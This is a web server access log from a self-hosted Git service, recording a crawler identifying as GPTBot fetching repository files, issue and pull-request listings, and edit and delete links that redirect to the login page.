git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:47:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:47:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:47:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:47:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:19:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:19:47:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:19:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:19:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:19:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:19:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 4663] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 23750] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:19:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 6319] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:19:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 11096] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:19:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 11096] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:19:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 11095] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:19:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12791] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:48:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:48:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:48:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:48:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:48:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:19:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:19:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:19:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35757] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 